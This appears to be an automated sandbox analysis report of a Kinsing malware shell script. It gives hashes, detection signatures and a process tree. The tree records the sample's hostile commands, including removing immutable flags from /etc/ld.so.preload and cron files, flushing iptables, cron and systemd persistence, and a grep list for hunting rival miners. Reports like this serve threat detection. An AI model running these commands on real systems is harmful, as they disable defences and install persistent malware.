Analysis
-
max time kernel
93s -
max time network
152s -
platform
debian-9_mips -
resource
debian9-mipsbe-20240611-en -
resource tags
arch:mipsimage:debian9-mipsbe-20240611-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipssystem -
submitted
24/02/2025, 02:07
Static task
static1
Behavioral task
behavioral1
Sample
0edf7789b066e608703132735e56c1e56c026773e7a063cec70c7793a8a57ed8.sh
Resource
ubuntu1804-amd64-20240729-en
Behavioral task
behavioral2
Sample
0edf7789b066e608703132735e56c1e56c026773e7a063cec70c7793a8a57ed8.sh
Resource
debian9-armhf-20240418-en
Behavioral task
behavioral3
Sample
0edf7789b066e608703132735e56c1e56c026773e7a063cec70c7793a8a57ed8.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
0edf7789b066e608703132735e56c1e56c026773e7a063cec70c7793a8a57ed8.sh
Resource
debian9-mipsel-20240611-en
General
-
Target
0edf7789b066e608703132735e56c1e56c026773e7a063cec70c7793a8a57ed8.sh
-
Size
15KB
-
MD5
773fe2ef07fd7a23e4726d9570465b7e
-
SHA1
179de0aed79976701debd15d1a4e3b401ce38a60
-
SHA256
0edf7789b066e608703132735e56c1e56c026773e7a063cec70c7793a8a57ed8
-
SHA512
cfc7ac4c396ee0f467e98eaa3b101f68b863847a65872770835fae9a530a9663bda229b5d7f48a9f0b5547dd78ecdd433a96f956e25279db3e8f34650250c91b
-
SSDEEP
384:r5JxgzLuqlH2wx2vUaQa5/eN86704s80ooJQYgykWT4yCtvUsDjdWOoJwR:trgXux7YJDj8OoJwR
Malware Config
Signatures
-
Kinsing Rootkit
Rootkit reuses the publicly available BEURK rootkit.
-
Kinsing Rootkit payload 1 IoCs
resource yara_rule behavioral3/files/fstream-19.dat family_elf_kinsing_rootkit -
Kinsing family
-
Kinsing payload 1 IoCs
resource yara_rule behavioral3/files/fstream-18.dat family_elf_kinsing_loader -
Kinsing_rootkit family
-
Modifies the dynamic linker configuration file 2 TTPs 1 IoCs
Malware can modify the configuration file of the dynamic linker to preload malicous libraries with every executed process.
description ioc Process File opened for modification /etc/ld.so.preload 0edf7789b066e608703132735e56c1e56c026773e7a063cec70c7793a8a57ed8.sh -
File and Directory Permissions Modification 1 TTPs 8 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 1716 chmod 1722 chmod 1723 chmod 1696 chmod 1698 chmod 1707 chmod 1709 chmod 1714 chmod -
Executes dropped EXE 1 IoCs
ioc pid Process /etc/data/kinsing 1724 0edf7789b066e608703132735e56c1e56c026773e7a063cec70c7793a8a57ed8.sh -
Flushes firewall rules 1 TTPs 1 IoCs
Flushes/ disables firewall rules inside the Linux kernel.
pid Process 726 iptables -
Abuse Elevation Control Mechanism: Sudo and Sudo Caching 1 TTPs 1 IoCs
Abuse sudo or cached sudo credentials to execute code.
pid Process 1444 sudo -
Attempts to change immutable files 50 IoCs
Modifies inode attributes on the filesystem to allow changing of immutable files.
pid Process 1616 xargs 1622 xargs 1623 sed 1601 xargs 1602 sed 1604 xargs 719 chattr 1523 xargs 1535 xargs 1548 xargs 1554 xargs 1605 sed 1560 xargs 712 chattr 723 chattr 1453 uname 1482 xargs 1608 sed 1611 sed 1498 xargs 1625 xargs 1628 xargs 1629 sed 1690 xargs 1566 xargs 1599 sed 1610 xargs 1614 sed 1632 sed 1508 xargs 1542 xargs 1626 sed 1646 xargs 1674 xargs 1685 xargs 1598 xargs 1503 xargs 1513 xargs 1518 xargs 1530 xargs 1620 sed 1631 xargs 1663 xargs 1477 xargs 1487 xargs 1607 xargs 1613 xargs 1634 xargs 1651 xargs 1492 xargs -
Creates/modifies Cron job 1 TTPs 64 IoCs
Cron allows running tasks on a schedule, and is commonly used for malware persistence.
description ioc Process File opened for modification /var/spool/cron/crontabs/tmp.nSGRA3 crontab File opened for modification /var/spool/cron/crontabs/tmp.PNtebk crontab File opened for modification /var/spool/cron/crontabs/tmp.mrfkiE crontab File opened for modification /var/spool/cron/crontabs/tmp.rQad1M crontab File opened for modification /var/spool/cron/crontabs/tmp.Zu0Kjh crontab File opened for modification /var/spool/cron/crontabs/tmp.b0HTF7 crontab File opened for modification /var/spool/cron/crontabs/tmp.Mt8cvB crontab File opened for modification /var/spool/cron/crontabs/tmp.WK5Wez crontab File opened for modification /var/spool/cron/crontabs/tmp.Zdpv2C crontab File opened for modification /var/spool/cron/crontabs/tmp.4ewVjr crontab File opened for modification /var/spool/cron/crontabs/tmp.cOej6u crontab File opened for modification /var/spool/cron/crontabs/tmp.ZgNPLn crontab File opened for modification /var/spool/cron/crontabs/tmp.xzPt4c crontab File opened for modification /var/spool/cron/crontabs/tmp.772wgw crontab File opened for modification /var/spool/cron/crontabs/tmp.JNlkCU crontab File opened for modification /var/spool/cron/crontabs/tmp.SjIeyM crontab File opened for modification /var/spool/cron/crontabs/tmp.OhOeiO crontab File opened for modification /var/spool/cron/crontabs/tmp.AEICcc crontab File opened for modification /var/spool/cron/crontabs/tmp.cM53Kt crontab File opened for modification /var/spool/cron/crontabs/tmp.LDlFZ5 crontab File opened for modification /var/spool/cron/crontabs/tmp.2hT0g2 crontab File opened for modification /var/spool/cron/crontabs/tmp.0vDQgG crontab File opened for modification /var/spool/cron/crontabs/tmp.7orBs1 crontab File opened for modification /var/spool/cron/crontabs/tmp.xb8gxv crontab File opened for modification /var/spool/cron/crontabs/tmp.tlvf1t crontab File opened for modification /var/spool/cron/crontabs/tmp.P7Byy7 crontab File opened for modification /var/spool/cron/crontabs/tmp.04vZWT crontab File opened for modification /var/spool/cron/crontabs/tmp.hek8Ko crontab File opened for modification /var/spool/cron/crontabs/tmp.drZoSf crontab File opened for modification /var/spool/cron/crontabs/tmp.BNdejk crontab File opened for modification /var/spool/cron/crontabs/tmp.7yU4tt crontab File opened for modification /var/spool/cron/crontabs/tmp.UfwZKO crontab File opened for modification /var/spool/cron/crontabs/tmp.GttrO0 crontab File opened for modification /var/spool/cron/crontabs/tmp.nbpAsY crontab File opened for modification /var/spool/cron/crontabs/tmp.HMbNcb crontab File opened for modification /var/spool/cron/crontabs/tmp.50t8Gf crontab File opened for modification /var/spool/cron/crontabs/tmp.vfObYr crontab File opened for modification /var/spool/cron/crontabs/tmp.4bXVKb crontab File opened for modification /var/spool/cron/crontabs/tmp.LBtn4b crontab File opened for modification /var/spool/cron/crontabs/tmp.oVInHZ crontab File opened for modification /var/spool/cron/crontabs/tmp.dMBZzz crontab File opened for modification /var/spool/cron/crontabs/tmp.aViLka crontab File opened for modification /var/spool/cron/crontabs/tmp.jkGQn0 crontab File opened for modification /var/spool/cron/crontabs/tmp.ZQoR6r crontab File opened for modification /var/spool/cron/crontabs/tmp.h3FU4R crontab File opened for modification /var/spool/cron/crontabs/tmp.hG6Vcg crontab File opened for modification /var/spool/cron/crontabs/tmp.tsc2Ad crontab File opened for modification /var/spool/cron/crontabs/tmp.yIBZ5z crontab File opened for modification /var/spool/cron/crontabs/tmp.Zk6AN6 crontab File opened for modification /var/spool/cron/crontabs/tmp.AA7G3O crontab File opened for modification /var/spool/cron/crontabs/tmp.SDZeZ3 crontab File opened for modification /var/spool/cron/crontabs/tmp.6QkDG8 crontab File opened for modification /var/spool/cron/crontabs/tmp.m6Xa6i crontab File opened for modification /var/spool/cron/crontabs/tmp.G5A8Gc crontab File opened for modification /var/spool/cron/crontabs/tmp.ZMzg0d crontab File opened for modification /var/spool/cron/crontabs/tmp.mGti5x crontab File opened for modification /var/spool/cron/crontabs/tmp.dePmOM crontab File opened for modification /var/spool/cron/crontabs/tmp.8HT3MD crontab File opened for modification /var/spool/cron/crontabs/tmp.AWKEtk crontab File opened for modification /var/spool/cron/crontabs/tmp.kVTRB0 crontab File opened for modification /var/spool/cron/crontabs/tmp.Uhn5aj crontab File opened for modification /var/spool/cron/crontabs/tmp.x3CWdB crontab File opened for modification /var/spool/cron/crontabs/tmp.oNhEzG crontab File opened for modification /var/spool/cron/crontabs/tmp.j3OVAq crontab -
Enumerates running processes
Discovers information about currently running processes on the system
-
Modifies systemd 2 TTPs 1 IoCs
Adds/ modifies systemd service files. Likely to achieve persistence.
description ioc Process File opened for modification /lib/systemd/system/bot.service 0edf7789b066e608703132735e56c1e56c026773e7a063cec70c7793a8a57ed8.sh -
Reads CPU attributes 1 TTPs 64 IoCs
description ioc Process File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online exim4 File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online exim4 File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill -
Enumerates kernel/hardware configuration 1 TTPs 2 IoCs
Reads contents of /sys virtual filesystem to enumerate system information.
description ioc Process File opened for reading /sys/fs/kdbus/0-system/bus systemctl File opened for reading /sys/fs/kdbus/0-system/bus systemctl -
Process Discovery 1 TTPs 12 IoCs
Adversaries may try to discover information about running processes.
pid Process 1519 ps 1531 ps 1686 ps 1494 ps 1504 ps 1509 ps 1526 ps 1594 ps 1642 ps 1647 ps 1499 ps 1514 ps -
description ioc Process File opened for reading /proc/707/status pkill File opened for reading /proc/326/status pkill File opened for reading /proc/1660/cmdline ps File opened for reading /proc/filesystems sed File opened for reading /proc/149/cmdline pkill File opened for reading /proc/1/cmdline ps File opened for reading /proc/1489/cmdline ps File opened for reading /proc/377/cmdline ps File opened for reading /proc/19/cmdline pkill File opened for reading /proc/243/status pkill File opened for reading /proc/1/stat ps File opened for reading /proc/37/stat ps File opened for reading /proc/106/status pkill File opened for reading /proc/14/status pkill File opened for reading /proc/tty/drivers ps File opened for reading /proc/117/stat ps File opened for reading /proc/74/status pkill File opened for reading /proc/706/cmdline pkill File opened for reading /proc/12/status pkill File opened for reading /proc/9/stat ps File opened for reading /proc/76/cmdline pkill File opened for reading /proc/18/status pkill File opened for reading /proc/716/cmdline ps File opened for reading /proc/665/status pkill File opened for reading /proc/37/status pkill File opened for reading /proc/21/cmdline pkill File opened for reading /proc/4/stat ps File opened for reading /proc/19/status pkill File opened for reading /proc/716/cmdline pkill File opened for reading /proc/243/cmdline pkill File opened for reading /proc/145/cmdline pkill File opened for reading /proc/671/cmdline pkill File opened for reading /proc/1469/cmdline pkill File opened for reading /proc/665/status ps File opened for reading /proc/self/fd xargs File opened for reading /proc/24/cmdline ps File opened for reading /proc/116/stat ps File opened for reading /proc/21/status ps File opened for reading /proc/378/status pkill File opened for reading /proc/23/stat ps File opened for reading /proc/71/cmdline pkill File opened for reading /proc/166/status pkill File opened for reading /proc/328/cmdline pkill File opened for reading /proc/330/cmdline pkill File opened for reading /proc/709/status pkill File opened for reading /proc/358/cmdline pkill File opened for reading /proc/166/stat ps File opened for reading /proc/15/cmdline ps File opened for reading /proc/filesystems sed File opened for reading /proc/70/stat ps File opened for reading /proc/36/cmdline pkill File opened for reading /proc/145/status pkill File opened for reading /proc/678/status pkill File opened for reading /proc/716/status pkill File opened for reading /proc/71/stat ps File opened for reading /proc/11/cmdline pkill File opened for reading /proc/22/status pkill File opened for reading /proc/75/status ps File opened for reading /proc/687/cmdline pkill File opened for reading /proc/79/status ps File opened for reading /proc/6/status ps File opened for reading /proc/filesystems crontab File opened for reading /proc/16/stat ps File opened for reading /proc/9/cmdline pkill -
System Network Configuration Discovery 1 TTPs 2 IoCs
Adversaries may gather information about the network configuration of a system.
pid Process 1395 ls 1829 sed
Processes
-
/tmp/0edf7789b066e608703132735e56c1e56c026773e7a063cec70c7793a8a57ed8.sh/tmp/0edf7789b066e608703132735e56c1e56c026773e7a063cec70c7793a8a57ed8.sh1⤵
- Modifies the dynamic linker configuration file
- Executes dropped EXE
- Modifies systemd
PID:709 -
/usr/bin/chattrchattr -i /etc/ld.so.preload2⤵
- Attempts to change immutable files
PID:712
-
-
/bin/rmrm -f /etc/ld.so.preload2⤵PID:714
-
-
/usr/bin/chattrchattr -R -ia /var/spool/cron2⤵
- Attempts to change immutable files
PID:719
-
-
/usr/bin/chattrchattr -ia /etc/crontab2⤵
- Attempts to change immutable files
PID:723
-
-
/sbin/iptablesiptables -F2⤵
- Flushes firewall rules
PID:726
-
-
/bin/grepgrep exe2⤵PID:735
-
-
/bin/lsls -latrh /proc/12⤵PID:733
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:740
-
-
/bin/grepgrep exe2⤵PID:745
-
-
/bin/lsls -latrh /proc/102⤵PID:744
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:747
-
-
/bin/grepgrep exe2⤵PID:751
-
-
/bin/lsls -latrh /proc/1062⤵PID:750
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:754
-
-
/bin/grepgrep exe2⤵PID:758
-
-
/bin/lsls -latrh /proc/112⤵PID:757
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:762
-
-
/bin/grepgrep exe2⤵PID:765
-
-
/bin/lsls -latrh /proc/1162⤵PID:764
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:768
-
-
/bin/grepgrep exe2⤵PID:771
-
-
/bin/lsls -latrh /proc/1172⤵PID:770
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:773
-
-
/bin/lsls -latrh /proc/122⤵PID:775
-
-
/bin/grepgrep exe2⤵PID:776
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:779
-
-
/bin/grepgrep exe2⤵PID:782
-
-
/bin/lsls -latrh /proc/132⤵PID:781
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:784
-
-
/bin/grepgrep exe2⤵PID:787
-
-
/bin/lsls -latrh /proc/142⤵PID:786
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:789
-
-
/bin/grepgrep exe2⤵PID:792
-
-
/bin/lsls -latrh /proc/1452⤵PID:791
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:794
-
-
/bin/grepgrep exe2⤵PID:797
-
-
/bin/lsls -latrh /proc/1492⤵PID:796
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:799
-
-
/bin/grepgrep exe2⤵PID:802
-
-
/bin/lsls -latrh /proc/152⤵PID:801
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:804
-
-
/bin/grepgrep exe2⤵PID:807
-
-
/bin/lsls -latrh /proc/162⤵PID:806
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:809
-
-
/bin/grepgrep exe2⤵PID:812
-
-
/bin/lsls -latrh /proc/1662⤵PID:811
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:814
-
-
/bin/grepgrep exe2⤵PID:817
-
-
/bin/lsls -latrh /proc/172⤵PID:816
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:819
-
-
/bin/lsls -latrh /proc/182⤵PID:821
-
-
/bin/grepgrep exe2⤵PID:822
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:824
-
-
/bin/grepgrep exe2⤵PID:827
-
-
/bin/lsls -latrh /proc/192⤵PID:826
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:829
-
-
/bin/grepgrep exe2⤵PID:832
-
-
/bin/lsls -latrh /proc/22⤵PID:831
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:834
-
-
